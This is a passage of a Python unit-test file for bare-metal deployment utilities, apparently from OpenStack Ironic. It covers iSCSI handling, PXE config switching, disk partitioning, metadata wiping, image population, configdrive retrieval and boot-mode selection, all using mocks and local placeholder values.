mock_verify.assert_called_once_with(iqn)\n\n mock_update.assert_called_once_with(iqn)\n\n mock_check_dev.assert_called_once_with(address, port, iqn)\n\n @mock.patch.object(utils, \'is_block_device\', lambda d: True)\n def test_always_logout_and_delete_iscsi(self):\n """"""Check if logout_iscsi() and delete_iscsi() are called.\n\n Make sure that logout_iscsi() and delete_iscsi() are called once\n login_iscsi() is invoked.\n\n """"""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 256\n ephemeral_format = \'exttest\'\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n\n class TestException(Exception):\n pass\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'work_on_disk\']\n patch_list = [mock.patch.object(utils, name,\n spec_set=types.FunctionType)\n for name in name_list]\n mock_list = [patcher.start() for patcher in patch_list]\n for patcher in patch_list:\n self.addCleanup(patcher.stop)\n\n parent_mock = mock.MagicMock(spec=[])\n for mocker, name in zip(mock_list, name_list):\n parent_mock.attach_mock(mocker, name)\n\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.work_on_disk.side_effect = TestException\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.work_on_disk(dev, root_mb, swap_mb,\n ephemeral_mb,\n ephemeral_format, image_path,\n node_uuid, configdrive=None,\n preserve_ephemeral=False,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n self.assertRaises(TestException, utils.deploy_partition_image,\n address, port, iqn, lun, image_path,\n root_mb, swap_mb, ephemeral_mb, ephemeral_format,\n node_uuid)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n\n\nclass SwitchPxeConfigTestCase(tests_base.TestCase):\n\n def _create_config(self, ipxe=False, boot_mode=None):\n (fd, fname) = tempfile.mkstemp()\n if boot_mode == \'uefi\':\n pxe_cfg = _UEFI_PXECONF_DEPLOY\n else:\n pxe_cfg = _IPXECONF_DEPLOY if ipxe else _PXECONF_DEPLOY\n os.write(fd, pxe_cfg)\n os.close(fd)\n self.addCleanup(os.unlink, fname)\n return fname\n\n def test_switch_pxe_config_partition_image(self):\n boot_mode = \'bios\'\n fname = self._create_config()\n utils.switch_pxe_config(fname,\n \'12345678-1234-1234-1234-1234567890abcdef\',\n boot_mode,\n False)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_PXECONF_BOOT_PARTITION, pxeconf)\n\n def test_switch_pxe_config_whole_disk_image(self):\n boot_mode = \'bios\'\n fname = self._create_config()\n utils.switch_pxe_config(fname,\n \'0x12345678\',\n boot_mode,\n True)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_PXECONF_BOOT_WHOLE_DISK, pxeconf)\n\n def test_switch_ipxe_config_partition_image(self):\n boot_mode = \'bios\'\n cfg.CONF.set_override(\'ipxe_enabled\', True, \'pxe\')\n fname = self._create_config(ipxe=True)\n utils.switch_pxe_config(fname,\n \'12345678-1234-1234-1234-1234567890abcdef\',\n boot_mode,\n False)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_IPXECONF_BOOT_PARTITION, pxeconf)\n\n def test_switch_ipxe_config_whole_disk_image(self):\n boot_mode = \'bios\'\n cfg.CONF.set_override(\'ipxe_enabled\', True, \'pxe\')\n fname = self._create_config(ipxe=True)\n utils.switch_pxe_config(fname,\n \'0x12345678\',\n boot_mode,\n True)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_IPXECONF_BOOT_WHOLE_DISK, pxeconf)\n\n def test_switch_uefi_pxe_config_partition_image(self):\n boot_mode = \'uefi\'\n fname = self._create_config(boot_mode=boot_mode)\n utils.switch_pxe_config(fname,\n \'12345678-1234-1234-1234-1234567890abcdef\',\n boot_mode,\n False)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_UEFI_PXECONF_BOOT_PARTITION, pxeconf)\n\n def test_switch_uefi_config_whole_disk_image(self):\n boot_mode = \'uefi\'\n fname = self._create_config(boot_mode=boot_mode)\n utils.switch_pxe_config(fname,\n \'0x12345678\',\n boot_mode,\n True)\n with open(fname, \'r\') as f:\n pxeconf = f.read()\n self.assertEqual(_UEFI_PXECONF_BOOT_WHOLE_DISK, pxeconf)\n\n\n@mock.patch(\'time.sleep\', lambda sec: None)\nclass OtherFunctionTestCase(db_base.DbTestCase):\n\n def setUp(self):\n super(OtherFunctionTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=""fake_pxe"")\n self.node = obj_utils.create_test_node(self.context, driver=\'fake_pxe\')\n\n def test_get_dev(self):\n expected = \'/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9\'\n actual = utils.get_dev(\'127.0.0.1\', 5678, \'iqn.fake\', 9)\n self.assertEqual(expected, actual)\n\n @mock.patch.object(os, \'stat\', autospec=True)\n @mock.patch.object(stat, \'S_ISBLK\', autospec=True)\n def test_is_block_device_works(self, mock_is_blk, mock_os):\n device = \'/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9\'\n mock_is_blk.return_value = True\n mock_os().st_mode = 10000\n self.assertTrue(utils.is_block_device(device))\n mock_is_blk.assert_called_once_with(mock_os().st_mode)\n\n @mock.patch.object(os, \'stat\', autospec=True)\n def test_is_block_device_raises(self, mock_os):\n device = \'/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9\'\n mock_os.side_effect = OSError\n self.assertRaises(exception.InstanceDeployFailure,\n utils.is_block_device, device)\n mock_os.assert_has_calls([mock.call(device)] * 3)\n\n @mock.patch.object(os.path, \'getsize\', autospec=True)\n @mock.patch.object(images, \'converted_size\', autospec=True)\n def test_get_image_mb(self, mock_csize, mock_getsize):\n mb = 1024 * 1024\n\n mock_getsize.return_value = 0\n mock_csize.return_value = 0\n self.assertEqual(0, utils.get_image_mb(\'x\', False))\n self.assertEqual(0, utils.get_image_mb(\'x\', True))\n mock_getsize.return_value = 1\n mock_csize.return_value = 1\n self.assertEqual(1, utils.get_image_mb(\'x\', False))\n self.assertEqual(1, utils.get_image_mb(\'x\', True))\n mock_getsize.return_value = mb\n mock_csize.return_value = mb\n self.assertEqual(1, utils.get_image_mb(\'x\', False))\n self.assertEqual(1, utils.get_image_mb(\'x\', True))\n mock_getsize.return_value = mb + 1\n mock_csize.return_value = mb + 1\n self.assertEqual(2, utils.get_image_mb(\'x\', False))\n self.assertEqual(2, utils.get_image_mb(\'x\', True))\n\n def test_parse_root_device_hints(self):\n self.node.properties[\'root_device\'] = {\'wwn\': 123456}\n expected = \'wwn=123456\'\n result = utils.parse_root_device_hints(self.node)\n self.assertEqual(expected, result)\n\n def test_parse_root_device_hints_string_space(self):\n self.node.properties[\'root_device\'] = {\'model\': \'fake model\'}\n expected = \'model=fake%20model\'\n result = utils.parse_root_device_hints(self.node)\n self.assertEqual(expected, result)\n\n def test_parse_root_device_hints_no_hints(self):\n self.node.properties = {}\n result = utils.parse_root_device_hints(self.node)\n self.assertIsNone(result)\n\n def test_parse_root_device_hints_invalid_hints(self):\n self.node.properties[\'root_device\'] = {\'vehicle\': \'Owlship\'}\n self.assertRaises(exception.InvalidParameterValue,\n utils.parse_root_device_hints, self.node)\n\n def test_parse_root_device_hints_invalid_size(self):\n self.node.properties[\'root_device\'] = {\'size\': \'not-int\'}\n self.assertRaises(exception.InvalidParameterValue,\n utils.parse_root_device_hints, self.node)\n\n\n@mock.patch.object(disk_partitioner.DiskPartitioner, \'commit\', lambda _: None)\nclass WorkOnDiskTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(WorkOnDiskTestCase, self).setUp()\n self.image_path = \'/tmp/xyz/image\'\n self.root_mb = 128\n self.swap_mb = 64\n self.ephemeral_mb = 0\n self.ephemeral_format = None\n self.configdrive_mb = 0\n self.dev = \'/dev/fake\'\n self.swap_part = \'/dev/fake-part1\'\n self.root_part = \'/dev/fake-part2\'\n\n self.mock_ibd_obj = mock.patch.object(\n utils, \'is_block_device\', autospec=True)\n self.mock_ibd = self.mock_ibd_obj.start()\n self.addCleanup(self.mock_ibd_obj.stop)\n self.mock_mp_obj = mock.patch.object(\n utils, \'make_partitions\', autospec=True)\n self.mock_mp = self.mock_mp_obj.start()\n self.addCleanup(self.mock_mp_obj.stop)\n self.mock_remlbl_obj = mock.patch.object(\n utils, \'destroy_disk_metadata\', autospec=True)\n self.mock_remlbl = self.mock_remlbl_obj.start()\n self.addCleanup(self.mock_remlbl_obj.stop)\n self.mock_mp.return_value = {\'swap\': self.swap_part,\n \'root\': self.root_part}\n\n def test_no_root_partition(self):\n self.mock_ibd.return_value = False\n self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.ephemeral_format, self.image_path, \'fake-uuid\')\n self.mock_ibd.assert_called_once_with(self.root_part)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n\n def test_no_swap_partition(self):\n self.mock_ibd.side_effect = iter([True, False])\n calls = [mock.call(self.root_part),\n mock.call(self.swap_part)]\n self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.ephemeral_format, self.image_path, \'fake-uuid\')\n self.assertEqual(self.mock_ibd.call_args_list, calls)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n\n def test_no_ephemeral_partition(self):\n ephemeral_part = \'/dev/fake-part1\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n ephemeral_mb = 256\n ephemeral_format = \'exttest\'\n\n self.mock_mp.return_value = {\'ephemeral\': ephemeral_part,\n \'swap\': swap_part,\n \'root\': root_part}\n self.mock_ibd.side_effect = iter([True, True, False])\n calls = [mock.call(root_part),\n mock.call(swap_part),\n mock.call(ephemeral_part)]\n self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, ephemeral_mb, ephemeral_format,\n self.image_path, \'fake-uuid\')\n self.assertEqual(self.mock_ibd.call_args_list, calls)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, ephemeral_mb,\n self.configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n\n @mock.patch.object(common_utils, \'unlink_without_raise\', autospec=True)\n @mock.patch.object(utils, \'_get_configdrive\', autospec=True)\n def test_no_configdrive_partition(self, mock_configdrive, mock_unlink):\n mock_configdrive.return_value = (10, \'fake-path\')\n swap_part = \'/dev/fake-part1\'\n configdrive_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n configdrive_url = \'http://127.0.0.1/cd\'\n configdrive_mb = 10\n\n self.mock_mp.return_value = {\'swap\': swap_part,\n \'configdrive\': configdrive_part,\n \'root\': root_part}\n self.mock_ibd.side_effect = iter([True, True, False])\n calls = [mock.call(root_part),\n mock.call(swap_part),\n mock.call(configdrive_part)]\n self.assertRaises(exception.InstanceDeployFailure,\n utils.work_on_disk, self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n self.ephemeral_format, self.image_path, \'fake-uuid\',\n preserve_ephemeral=False,\n configdrive=configdrive_url,\n boot_option=""netboot"")\n self.assertEqual(self.mock_ibd.call_args_list, calls)\n self.mock_mp.assert_called_once_with(self.dev, self.root_mb,\n self.swap_mb, self.ephemeral_mb,\n configdrive_mb, commit=True,\n boot_option=""netboot"",\n boot_mode=""bios"")\n mock_unlink.assert_called_once_with(\'fake-path\')\n\n\n@mock.patch.object(common_utils, \'execute\', autospec=True)\nclass MakePartitionsTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(MakePartitionsTestCase, self).setUp()\n self.dev = \'fake-dev\'\n self.root_mb = 1024\n self.swap_mb = 512\n self.ephemeral_mb = 0\n self.configdrive_mb = 0\n self.parted_static_cmd = [\'parted\', \'-a\', \'optimal\', \'-s\', self.dev,\n \'--\', \'unit\', \'MiB\', \'mklabel\', \'msdos\']\n\n def _test_make_partitions(self, mock_exc, boot_option):\n mock_exc.return_value = (None, None)\n utils.make_partitions(self.dev, self.root_mb, self.swap_mb,\n self.ephemeral_mb, self.configdrive_mb,\n boot_option=boot_option)\n\n expected_mkpart = [\'mkpart\', \'primary\', \'linux-swap\', \'1\', \'513\',\n \'mkpart\', \'primary\', \'\', \'513\', \'1537\']\n if boot_option == ""local"":\n expected_mkpart.extend([\'set\', \'2\', \'boot\', \'on\'])\n parted_cmd = self.parted_static_cmd + expected_mkpart\n parted_call = mock.call(*parted_cmd, run_as_root=True,\n check_exit_code=[0])\n fuser_cmd = [\'fuser\', \'fake-dev\']\n fuser_call = mock.call(*fuser_cmd, run_as_root=True,\n check_exit_code=[0, 1])\n mock_exc.assert_has_calls([parted_call, fuser_call])\n\n def test_make_partitions(self, mock_exc):\n self._test_make_partitions(mock_exc, boot_option=""netboot"")\n\n def test_make_partitions_local_boot(self, mock_exc):\n self._test_make_partitions(mock_exc, boot_option=""local"")\n\n def test_make_partitions_with_ephemeral(self, mock_exc):\n self.ephemeral_mb = 2048\n expected_mkpart = [\'mkpart\', \'primary\', \'\', \'1\', \'2049\',\n \'mkpart\', \'primary\', \'linux-swap\', \'2049\', \'2561\',\n \'mkpart\', \'primary\', \'\', \'2561\', \'3585\']\n cmd = self.parted_static_cmd + expected_mkpart\n mock_exc.return_value = (None, None)\n utils.make_partitions(self.dev, self.root_mb, self.swap_mb,\n self.ephemeral_mb, self.configdrive_mb)\n\n parted_call = mock.call(*cmd, run_as_root=True, check_exit_code=[0])\n mock_exc.assert_has_calls([parted_call])\n\n\n@mock.patch.object(utils, \'get_dev_block_size\', autospec=True)\n@mock.patch.object(common_utils, \'execute\', autospec=True)\nclass DestroyMetaDataTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(DestroyMetaDataTestCase, self).setUp()\n self.dev = \'fake-dev\'\n self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n def test_destroy_disk_metadata(self, mock_exec, mock_gz):\n mock_gz.return_value = 64\n expected_calls = [mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', run_as_root=True,\n check_exit_code=[0]),\n mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', \'seek=28\',\n run_as_root=True,\n check_exit_code=[0])]\n utils.destroy_disk_metadata(self.dev, self.node_uuid)\n mock_exec.assert_has_calls(expected_calls)\n self.assertTrue(mock_gz.called)\n\n def test_destroy_disk_metadata_get_dev_size_fail(self, mock_exec, mock_gz):\n mock_gz.side_effect = processutils.ProcessExecutionError\n\n expected_call = [mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', run_as_root=True,\n check_exit_code=[0])]\n self.assertRaises(processutils.ProcessExecutionError,\n utils.destroy_disk_metadata,\n self.dev,\n self.node_uuid)\n mock_exec.assert_has_calls(expected_call)\n\n def test_destroy_disk_metadata_dd_fail(self, mock_exec, mock_gz):\n mock_exec.side_effect = processutils.ProcessExecutionError\n\n expected_call = [mock.call(\'dd\', \'if=/dev/zero\', \'of=fake-dev\',\n \'bs=512\', \'count=36\', run_as_root=True,\n check_exit_code=[0])]\n self.assertRaises(processutils.ProcessExecutionError,\n utils.destroy_disk_metadata,\n self.dev,\n self.node_uuid)\n mock_exec.assert_has_calls(expected_call)\n self.assertFalse(mock_gz.called)\n\n\n@mock.patch.object(common_utils, \'execute\', autospec=True)\nclass GetDeviceBlockSizeTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(GetDeviceBlockSizeTestCase, self).setUp()\n self.dev = \'fake-dev\'\n self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n def test_get_dev_block_size(self, mock_exec):\n mock_exec.return_value = (""64"", """")\n expected_call = [mock.call(\'blockdev\', \'--getsz\', self.dev,\n run_as_root=True, check_exit_code=[0])]\n utils.get_dev_block_size(self.dev)\n mock_exec.assert_has_calls(expected_call)\n\n\n@mock.patch.object(utils, \'dd\', autospec=True)\n@mock.patch.object(images, \'qemu_img_info\', autospec=True)\n@mock.patch.object(images, \'convert_image\', autospec=True)\nclass PopulateImageTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(PopulateImageTestCase, self).setUp()\n\n def test_populate_raw_image(self, mock_cg, mock_qinfo, mock_dd):\n type(mock_qinfo.return_value).file_format = mock.PropertyMock(\n return_value=\'raw\')\n utils.populate_image(\'src\', \'dst\')\n mock_dd.assert_called_once_with(\'src\', \'dst\')\n self.assertFalse(mock_cg.called)\n\n def test_populate_qcow2_image(self, mock_cg, mock_qinfo, mock_dd):\n type(mock_qinfo.return_value).file_format = mock.PropertyMock(\n return_value=\'qcow2\')\n utils.populate_image(\'src\', \'dst\')\n mock_cg.assert_called_once_with(\'src\', \'dst\', \'raw\', True)\n self.assertFalse(mock_dd.called)\n\n\n@mock.patch.object(utils, \'is_block_device\', lambda d: True)\n@mock.patch.object(utils, \'block_uuid\', lambda p: \'uuid\')\n@mock.patch.object(utils, \'dd\', lambda *_: None)\n@mock.patch.object(images, \'convert_image\', lambda *_: None)\n@mock.patch.object(common_utils, \'mkfs\', lambda *_: None)\n# NOTE(dtantsur): destroy_disk_metadata resets file size, disabling it\n@mock.patch.object(utils, \'destroy_disk_metadata\', lambda *_: None)\nclass RealFilePartitioningTestCase(tests_base.TestCase):\n """"""This test applies some real-world partitioning scenario to a file.\n\n This test covers the whole partitioning, mocking everything not possible\n on a file. That helps us assure, that we do all partitioning math properly\n and also conducts integration testing of DiskPartitioner.\n """"""\n\n def setUp(self):\n super(RealFilePartitioningTestCase, self).setUp()\n # NOTE(dtantsur): no parted utility on gate-ironic-python26\n try:\n common_utils.execute(\'parted\', \'--version\')\n except OSError as exc:\n self.skipTest(\'parted utility was not found: %s\' % exc)\n self.file = tempfile.NamedTemporaryFile(delete=False)\n # NOTE(ifarkas): the file needs to be closed, so fuser won\'t report\n # any usage\n self.file.close()\n # NOTE(dtantsur): 20 MiB file with zeros\n common_utils.execute(\'dd\', \'if=/dev/zero\', \'of=%s\' % self.file.name,\n \'bs=1\', \'count=0\', \'seek=20MiB\')\n\n @staticmethod\n def _run_without_root(func, *args, **kwargs):\n """"""Make sure root is not required when using utils.execute.""""""\n real_execute = common_utils.execute\n\n def fake_execute(*cmd, **kwargs):\n kwargs[\'run_as_root\'] = False\n return real_execute(*cmd, **kwargs)\n\n with mock.patch.object(common_utils, \'execute\', fake_execute):\n return func(*args, **kwargs)\n\n def test_different_sizes(self):\n # NOTE(dtantsur): Keep this list in order with expected partitioning\n fields = [\'ephemeral_mb\', \'swap_mb\', \'root_mb\']\n variants = ((0, 0, 12), (4, 2, 8), (0, 4, 10), (5, 0, 10))\n for variant in variants:\n kwargs = dict(zip(fields, variant))\n self._run_without_root(utils.work_on_disk, self.file.name,\n ephemeral_format=\'ext4\', node_uuid=\'\',\n image_path=\'path\', **kwargs)\n part_table = self._run_without_root(\n disk_partitioner.list_partitions, self.file.name)\n for part, expected_size in zip(part_table, filter(None, variant)):\n self.assertEqual(expected_size, part[\'size\'],\n ""comparison failed for %s"" % list(variant))\n\n def test_whole_disk(self):\n # 6 MiB ephemeral + 3 MiB swap + 9 MiB root + 1 MiB for MBR\n # + 1 MiB MAGIC == 20 MiB whole disk\n # TODO(dtantsur): figure out why we need \'magic\' 1 more MiB\n # and why the is different on Ubuntu and Fedora (see below)\n self._run_without_root(utils.work_on_disk, self.file.name,\n root_mb=9, ephemeral_mb=6, swap_mb=3,\n ephemeral_format=\'ext4\', node_uuid=\'\',\n image_path=\'path\')\n part_table = self._run_without_root(\n disk_partitioner.list_partitions, self.file.name)\n sizes = [part[\'size\'] for part in part_table]\n # NOTE(dtantsur): parted in Ubuntu 12.04 will occupy the last MiB,\n # parted in Fedora 20 won\'t - thus two possible variants for last part\n self.assertEqual([6, 3], sizes[:2],\n ""unexpected partitioning %s"" % part_table)\n self.assertIn(sizes[2], (9, 10))\n\n @mock.patch.object(image_cache, \'clean_up_caches\', autospec=True)\n def test_fetch_images(self, mock_clean_up_caches):\n\n mock_cache = mock.MagicMock(\n spec_set=[\'fetch_image\', \'master_dir\'], master_dir=\'master_dir\')\n utils.fetch_images(None, mock_cache, [(\'uuid\', \'path\')])\n mock_clean_up_caches.assert_called_once_with(None, \'master_dir\',\n [(\'uuid\', \'path\')])\n mock_cache.fetch_image.assert_called_once_with(\'uuid\', \'path\',\n ctx=None,\n force_raw=True)\n\n @mock.patch.object(image_cache, \'clean_up_caches\', autospec=True)\n def test_fetch_images_fail(self, mock_clean_up_caches):\n\n exc = exception.InsufficientDiskSpace(path=\'a\',\n required=2,\n actual=1)\n\n mock_cache = mock.MagicMock(\n spec_set=[\'master_dir\'], master_dir=\'master_dir\')\n mock_clean_up_caches.side_effect = iter([exc])\n self.assertRaises(exception.InstanceDeployFailure,\n utils.fetch_images,\n None,\n mock_cache,\n [(\'uuid\', \'path\')])\n mock_clean_up_caches.assert_called_once_with(None, \'master_dir\',\n [(\'uuid\', \'path\')])\n\n\n@mock.patch.object(shutil, \'copyfileobj\', autospec=True)\n@mock.patch.object(requests, \'get\', autospec=True)\nclass GetConfigdriveTestCase(tests_base.TestCase):\n\n @mock.patch.object(gzip, \'GzipFile\', autospec=True)\n def test_get_configdrive(self, mock_gzip, mock_requests, mock_copy):\n mock_requests.return_value = mock.MagicMock(\n spec_set=[\'content\'], content=\'Zm9vYmFy\')\n utils._get_configdrive(\'http://127.0.0.1/cd\', \'fake-node-uuid\')\n mock_requests.assert_called_once_with(\'http://127.0.0.1/cd\')\n mock_gzip.assert_called_once_with(\'configdrive\', \'rb\',\n fileobj=mock.ANY)\n mock_copy.assert_called_once_with(mock.ANY, mock.ANY)\n\n @mock.patch.object(gzip, \'GzipFile\', autospec=True)\n def test_get_configdrive_base64_string(self, mock_gzip, mock_requests,\n mock_copy):\n utils._get_configdrive(\'Zm9vYmFy\', \'fake-node-uuid\')\n self.assertFalse(mock_requests.called)\n mock_gzip.assert_called_once_with(\'configdrive\', \'rb\',\n fileobj=mock.ANY)\n mock_copy.assert_called_once_with(mock.ANY, mock.ANY)\n\n def test_get_configdrive_bad_url(self, mock_requests, mock_copy):\n mock_requests.side_effect = requests.exceptions.RequestException\n self.assertRaises(exception.InstanceDeployFailure,\n utils._get_configdrive, \'http://127.0.0.1/cd\',\n \'fake-node-uuid\')\n self.assertFalse(mock_copy.called)\n\n @mock.patch.object(base64, \'b64decode\', autospec=True)\n def test_get_configdrive_base64_error(self, mock_b64, mock_requests,\n mock_copy):\n mock_b64.side_effect = TypeError\n self.assertRaises(exception.InstanceDeployFailure,\n utils._get_configdrive,\n \'malformed\', \'fake-node-uuid\')\n mock_b64.assert_called_once_with(\'malformed\')\n self.assertFalse(mock_copy.called)\n\n @mock.patch.object(gzip, \'GzipFile\', autospec=True)\n def test_get_configdrive_gzip_error(self, mock_gzip, mock_requests,\n mock_copy):\n mock_requests.return_value = mock.MagicMock(\n spec_set=[\'content\'], content=\'Zm9vYmFy\')\n mock_copy.side_effect = IOError\n self.assertRaises(exception.InstanceDeployFailure,\n utils._get_configdrive, \'http://127.0.0.1/cd\',\n \'fake-node-uuid\')\n mock_requests.assert_called_once_with(\'http://127.0.0.1/cd\')\n mock_gzip.assert_called_once_with(\'configdrive\', \'rb\',\n fileobj=mock.ANY)\n mock_copy.assert_called_once_with(mock.ANY, mock.ANY)\n\n\nclass VirtualMediaDeployUtilsTestCase(db_base.DbTestCase):\n\n def setUp(self):\n super(VirtualMediaDeployUtilsTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=""iscsi_ilo"")\n info_dict = db_utils.get_test_ilo_info()\n self.node = obj_utils.create_test_node(self.context,\n driver=\'iscsi_ilo\', driver_info=info_dict)\n\n def test_get_single_nic_with_vif_port_id(self):\n obj_utils.create_test_port(self.context, node_id=self.node.id,\n address=\'aa:bb:cc\', uuid=uuidutils.generate_uuid(),\n extra={\'vif_port_id\': \'test-vif-A\'}, driver=\'iscsi_ilo\')\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n address = utils.get_single_nic_with_vif_port_id(task)\n self.assertEqual(\'aa:bb:cc\', address)\n\n\nclass ParseInstanceInfoCapabilitiesTestCase(tests_base.TestCase):\n\n def setUp(self):\n super(ParseInstanceInfoCapabilitiesTestCase, self).setUp()\n self.node = obj_utils.get_test_node(self.context, driver=\'fake\')\n\n def test_parse_instance_info_capabilities_string(self):\n self.node.instance_info = {\'capabilities\': \'{""cat"": ""meow""}\'}\n expected_result = {""cat"": ""meow""}\n result = utils.parse_instance_info_capabilities(self.node)\n self.assertEqual(expected_result, result)\n\n def test_parse_instance_info_capabilities(self):\n self.node.instance_info = {\'capabilities\': {""dog"": ""wuff""}}\n expected_result = {""dog"": ""wuff""}\n result = utils.parse_instance_info_capabilities(self.node)\n self.assertEqual(expected_result, result)\n\n def test_parse_instance_info_invalid_type(self):\n self.node.instance_info = {\'capabilities\': \'not-a-dict\'}\n self.assertRaises(exception.InvalidParameterValue,\n utils.parse_instance_info_capabilities, self.node)\n\n def test_is_secure_boot_requested_true(self):\n self.node.instance_info = {\'capabilities\': {""secure_boot"": ""tRue""}}\n self.assertTrue(utils.is_secure_boot_requested(self.node))\n\n def test_is_secure_boot_requested_false(self):\n self.node.instance_info = {\'capabilities\': {""secure_boot"": ""false""}}\n self.assertFalse(utils.is_secure_boot_requested(self.node))\n\n def test_is_secure_boot_requested_invalid(self):\n self.node.instance_info = {\'capabilities\': {""secure_boot"": ""invalid""}}\n self.assertFalse(utils.is_secure_boot_requested(self.node))\n\n def test_get_boot_mode_for_deploy_using_capabilities(self):\n properties = {\'capabilities\': \'boot_mode:uefi,cap2:value2\'}\n self.node.properties = properties\n\n result = utils.get_boot_mode_for_deploy(self.node)\n self.assertEqual(\'uefi\', result)\n\n def test_get_boot_mode_for_deploy_using_instance_info_cap(self):\n instance_info = {\'capabilities\': {\'secure_boot\': \'True\'}}\n self.node.instance_info = instance_info\n\n result = utils.get_boot_mode_for_deploy(self.node)\n self.assertEqual(\'uefi\', result)\n\n def test_get_boot_mode_for_deploy_using_instance_info(self):\n instance_info = {\'deploy_boot_mode\': \'bios\'}\n self.node.instance_info = instance_info\n\n result = utils.get_boot_mode_for_deploy(self.node)\n self.assertEqual(\'bios\', result)\n\n\nclass TrySetBootDeviceTestCase(db_base.DbTestCase):\n\n def setUp(self):\n super(TrySetBootDeviceTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=""fake"")\n self.node = obj_utils.create_test_node(self.context, driver=""fake"")\n\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_okay(self, node_set_boot_device_mock):\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n utils.try_set_boot_device(task, boot_devices.DISK,\n persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n\n @mock.patch.object(utils, \'LOG\', autospec=True)\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_ipmifailure_uefi(self,\n node_set_boot_device_mock, log_mock):\n self.node.properties = {\'capabilities\': \'boot_mode:uefi\'}\n self.node.save()\n node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd=\'a\')\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n utils.try_set_boot_device(task, boot_devices.DISK,\n persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n log_mock.warning.assert_called_once_with(mock.ANY)\n\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_ipmifailure_bios(\n self, node_set_boot_device_mock):\n node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd=\'a\')\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n self.assertRaises(exception.IPMIFailure,\n utils.try_set_boot_device,\n task, boot_devices.DISK, persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_some_other_exception(\n self, node_set_boot_device_mock):\n exc = exception.IloOperationError(operation=""qwe"", error=""error"")\n node_set_boot_device_mock.side_effect = exc\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n self.assertRaises(exception.IloOperationError,\n utils.try_set_boot_device,\n task, boot_devices.DISK, persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n\n\nclass AgentCleaningTestCase(db_base.DbTestCase):\n def setUp(self):\n super(AgentCleaningTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=\'fake_agent\')\n n = {\'driver\': \'fake_agent\',\n \'driver_internal_info\': {\'agent_url\': \'http://127.0.0.1:9999\'}}\n\n self.node = obj_utils.create_test_node(self.context, **n)\n self.ports = 